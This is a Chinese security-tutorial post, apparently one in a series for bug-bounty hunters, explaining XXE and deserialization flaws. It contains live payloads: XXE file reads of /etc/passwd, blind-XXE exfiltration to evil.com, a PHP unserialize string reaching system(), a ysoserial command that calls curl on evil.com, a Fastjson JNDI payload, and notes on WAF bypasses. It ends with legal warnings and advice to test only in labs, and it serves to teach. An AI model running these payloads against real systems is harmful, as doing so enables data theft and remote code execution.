上期回顾 :我们用 SSRF 借刀杀人,打进了内网。本期难度直线上升 ,我们将挑战两个让程序员闻风丧胆的"贵族漏洞"------XXE 和 反序列化。
这两个漏洞一旦爆发,通常不是"拿个Shell"那么简单,而是直接接管服务器集群。☠️
一、XXE:XML的"胃口"太大了
1. 什么是 XXE?
XXE (XML External Entity Injection),即 XML 外部实体注入。
想象一下,你给服务器递了一张 "菜单(XML)" ,服务器不仅照单全收,还把你菜单里写的 **"去把老板保险柜密码念一遍"** 也给执行了。
核心痛点 :服务器解析 XML 时,默认允许加载外部实体。
2. 实战案例:读取服务器密码
很多老旧的 OA 系统、支付接口还在用 XML 传输数据。
原始请求:
http
POST /api/pay HTTP/1.1
Content-Type: application/xml
<user>
<name>Tom</name>
<money>100</money>
</user>攻击 Payload:
XML
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<user>
<name>&xxe;</name>
<money>100</money>
</user>发生了什么?
-
<!ENTITY xxe SYSTEM "file:///etc/passwd">:定义了一个实体xxe,内容是读取系统文件/etc/passwd。 -
&xxe;:在 XML 中引用这个实体。 -
结果:服务器返回的数据里,包含了 Linux 系统的所有用户账户信息。
3. Blind XXE(无回显的绝杀)
如果服务器不把解析结果显示在页面上怎么办?把数据外带出去。
攻击思路:
-
你有一台公网服务器
evil.com。 -
诱导目标服务器加载
http://evil.com/?data=读取到的机密文件。
Payload 示意:
XML
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=/etc/passwd">
<!ENTITY % dtd "<!ENTITY % exfiltrate SYSTEM 'http://evil.com/?data=%file;'>">二、反序列化:给程序"下毒"
1. 什么是反序列化?
序列化:把对象(Object)变成字符串(方便传输)。
反序列化:把字符串变回对象(恢复状态)。
漏洞原理:
你买了一盒乐高(序列化数据),说明书被坏人换成了"组装成炸弹"的步骤(恶意构造的 Payload)。你照着说明书拼,结果家里炸了。
2. PHP 反序列化(魔术方法)
PHP 中有一些特殊的函数(Magic Methods),比如 __wakeup()(醒来时执行)、__destruct()(销毁时执行)。
危险代码:
php
class User {
public $name;
function __destruct() {
system($this->name); // 销毁时执行系统命令
}
}Payload 构造:
我们只需要构造一个字符串,让 $name等于 whoami。
php
O:4:"User":1:{s:4:"name";s:6:"whoami";}结果 :程序结束时调用 __destruct(),执行了 system('whoami')。
3. Java 反序列化(重灾区)
Java 的 Commons-Collections 组件曾经是"漏洞之王"。
特点 :不需要懂代码,直接用工具(如 ysoserial)生成 Payload。
bash
java -jar ysoserial.jar CommonsCollections5 "curl http://evil.com" > payload.bin把这个 payload.bin发送给目标,目标就会反向连接到你的服务器。
三、SRC 实战中的"骚操作"
| 漏洞类型 | 利用难度 | 危害程度 | 常见位置 |
|---|---|---|---|
| XXE | 低 | 高 | Office文档解析、SOAP接口、老旧支付 |
| PHP反序列化 | 中 | 极高 | 缓存系统、Session、框架内核 |
| Java反序列化 | 高 | 毁灭级 | Weblogic, JBoss, Fastjson |
Fastjson 案例:
曾经风靡一时的 Fastjson 1.2.24。
Payload 只需指定 @type,服务器就会去加载你指定的恶意类。
json
{
"@type": "com.sun.rowset.JdbcRowSetImpl",
"dataSourceName": "ldap://evil.com/Exploit",
"autoCommit": true
}四、绕过与防御(简版)
XXE 绕过
-
编码绕过 :使用 UTF-16BE 编码,绕过 WAF 对
<!ENTITY的检测。 -
内网攻击:结合 SSRF,利用 XXE 去攻击内网的 Redis。
反序列化绕过
-
白名单绕过:寻找新的 Gadget(利用链)。
-
长度绕过 :利用
phar://协议触发反序列化。
五、互动与思考
💬 互动话题:
各位师傅,你们在挖洞时遇到过"反序列化"漏洞吗?
是那种一打一个准的 Fastjson,还是让人头秃的 PHP POP 链?欢迎分享你的"链子"!⛓️
⚠️ 法律红线警示
-
严禁 在实际系统中尝试读取
/etc/passwd或任何系统文件,证明漏洞存在即可。 -
严禁 使用
ysoserial或类似工具向未授权目标发送 Payload,这属于非法入侵。 -
严禁利用 XXE 探测内网或攻击 Redis(除非是明确授权的靶场)。
-
测试原则:
-
XXE :使用
file:///etc/hostname或php://filter读取非敏感文件。 -
反序列化:仅测试是否存在报错回显,不要执行系统命令。
-
所有实验请在 Vulhub 或本地 Docker 靶场中进行。
**代码审计是门艺术,但利用漏洞必须是守法的行为。切勿以身试法。** 🛡️
-
下一期,我们将进入 "GraphQL & API 安全"------ 现代 API 的那些坑"。想知道怎么用一条查询语句拖库吗?敬请期待!🚀